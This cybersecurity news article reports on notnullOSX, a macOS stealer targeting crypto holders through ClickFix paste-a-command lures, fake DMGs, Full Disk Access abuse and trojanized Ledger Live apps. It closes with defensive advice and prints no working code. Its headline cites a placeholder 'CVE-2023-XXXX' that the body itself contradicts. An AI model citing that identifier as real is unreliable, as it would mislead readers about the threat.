Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
India Halts WhatsApp Usernames Rollout Due to Fraud Concerns
July 1, 2026
Critical Cursor IDE RCE Vulnerabilities Allow Zero-Click Prompt Injection
July 1, 2026
Automated Password Spray Attacks Target Microsoft Azure CLI
July 1, 2026
Home/Threats/ClickFix macOS Vulnerability (CVE-2023-XXXX) Lets Attackers Deliver notnullOSX
Threats

ClickFix macOS Vulnerability (CVE-2023-XXXX) Lets Attackers Deliver notnullOSX

Key Takeaways A new macOS information stealer, notnullOSX, has emerged, specifically targeting cryptocurrency holders with balances exceeding $10,000. The malware employs social engineering via a...

Emy Elsamnoudy
Emy Elsamnoudy
April 9, 2026 4 Min Read
27 0

Key Takeaways

  • A new macOS information stealer, notnullOSX, has emerged, specifically targeting cryptocurrency holders with balances exceeding $10,000.
  • The malware employs social engineering via a “ClickFix” method or malicious DMG files to bypass macOS security and gain Full Disk Access.
  • Developed by an individual known as 0xFFF, now operating as alh1mik, the stealer is highly targeted, with operators manually vetting victims through an affiliate panel.
  • notnullOSX uses a modular design to steal various data, including cryptocurrency wallet details, browser credentials, messages, and can even replace legitimate hardware wallet applications.
  • No specific CVE ID for the “ClickFix” social engineering method was provided in the source material, but the threat is active and requires immediate user vigilance.

A sophisticated new macOS information stealer, dubbed notnullOSX, has been identified, focusing its attacks on cryptocurrency investors holding over $10,000 in their digital wallets. Written in the Go programming language, this malware leverages two distinct infection vectors—a social engineering tactic referred to as “ClickFix” and the distribution of malicious Disk Image (DMG) files—to covertly compromise Apple Mac systems.

Table Of Content

  • Key Takeaways
  • The Evolution of notnullOSX
  • Initial Infection Chains
  • Inside the Attack: TCC Bypass and Modular Data Theft
  • What You Should Do

The operation behind notnullOSX is characterized by its precise targeting. Threat actors meticulously select each victim through a dedicated affiliate panel before initiating an attack, ensuring a high potential return on their efforts.

The Evolution of notnullOSX

The origins of notnullOSX trace back to 2022, when a developer known as 0xFFF first showcased an early version of a macOS stealer on underground hacking forums. Following a reported exit from the scene in 2023, allegedly due to a rival’s fabricated law enforcement tip, 0xFFF resurfaced in August 2024 under the new alias “alh1mik.” The individual issued an apology and began accepting preorders for a refined macOS stealer at a monthly subscription cost of $400. By 2026, this offering had materialized into the notnullOSX malware.

Researchers at Moonlock Lab recorded the first detections of notnullOSX on March 30, 2026, observing activity in Vietnam, Taiwan, and Spain. Their analysis confirmed the malware’s highly targeted nature. Before any attack, operators are required to submit a form detailing the victim’s social media profiles, cryptocurrency wallet addresses, and communication history. Submissions for victims with wallet balances below $10,000 are automatically rejected.

Initial Infection Chains

The attack typically commences with a deceptive Google document, which presents an encryption error and prompts the victim to choose one of two actions, both ultimately leading to malware installation. The first method, “ClickFix,” instructs the user to open Terminal and paste a base64-encoded command. This command surreptitiously retrieves and executes a remote bash installer script. The second approach involves a malicious DMG disk image, disguised as a routine file with a README, an installation script, and a Terminal shortcut. In both scenarios, victims unknowingly install the malware without triggering any security alerts.

The distribution infrastructure for notnullOSX extends to a fake product page for a wallpaper application named WallSpace, hosted at wallpapermacos[.]com. This page features professional screenshots and a prominent “free download” button. Furthermore, a long-dormant YouTube channel, inactive since 2015, was hijacked to promote the fake app. A single video on this channel garnered 50,000 views in just two weeks, suggesting either paid promotion or sophisticated SEO manipulation.

Inside the Attack: TCC Bypass and Modular Data Theft

A critical aspect of notnullOSX’s danger lies in its ability to subvert macOS’s native permission system. Apple’s Transparency, Consent, and Control (TCC) framework typically generates pop-up prompts when applications attempt to access sensitive user data, such as messages, notes, or browser cookies. notnullOSX circumvents this by manipulating victims into manually granting “Full Disk Access” within System Settings.

Granting this single permission bypasses all subsequent TCC prompts, allowing the malware unfettered access to all protected data categories without further user interaction. The malware employs a modular architecture, downloading specific binaries from its command-and-control (C2) server for each data exfiltration task. Identified modules include iMessageGrab, AppleNotesGrab, CryptoWalletsGrab, BrowserGrab, TelegramGrab, CredsGrab, and ReplaceApp.

The “ReplaceApp” module is particularly concerning. It silently substitutes legitimate hardware wallet applications, such as Ledger Live, with trojanized versions. These malicious clones are designed to intercept seed phrases during the setup process, thus compromising even users who rely on the enhanced security of hardware wallets, as long as the managing software on their Mac is compromised.

Beyond data theft, notnullOSX maintains a persistent WebSocket connection to a Firebase-hosted C2 server. It sends regular heartbeats and awaits remote commands, exhibiting behavior more akin to a full-fledged remote access trojan (RAT) than a simple, one-time information stealer.

What You Should Do

  • For Security Teams: Block outbound connections to known C2 domains associated with notnullOSX. Implement alerts for any unrecognized applications requesting Full Disk Access. Monitor the /tmp directory for the staging of Mach-O binaries.
  • For Mac Users and Cryptocurrency Holders: Never paste Terminal commands from untrusted sources, such as web pages or documents. Exercise extreme caution with any application that requests Full Disk Access during installation, especially if its origin is unclear. Regularly inspect ~/Library/LaunchAgents/ for any unfamiliar or suspicious entries.
  • Practice General Cyber Hygiene: Keep your macOS operating system and all applications updated to the latest versions. Use strong, unique passwords and enable multi-factor authentication (MFA) wherever possible. Be wary of phishing attempts and suspicious links.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackHackerMalwareSecurity

Share Article

Emy Elsamnoudy

Emy Elsamnoudy

Emy is a cybersecurity analyst and reporter specializing in threat hunting, defense strategies, and industry trends. With expertise in proactive security measures, Emily covers the tools and techniques organizations use to detect and prevent cyber attacks. She is a regular speaker at security conferences and has contributed to industry reports on threat intelligence and security operations. Emily's reporting focuses on helping organizations improve their security posture through practical, actionable insights.

Previous Post

STX RAT Malware Evades Detection with Hidden RDP and Infostealer Functions

Next Post

macOS Script Editor Flaw Lets ClickFix Deliver Atomic Stealer

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Fluentd Vulnerabilities Allow Remote Code Execution
July 1, 2026
Weaponized Google Ads Install Malicious Claude Code to Hijack macOS
July 1, 2026
Critical Adobe ColdFusion Vulnerabilities Let Attackers Run Code
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us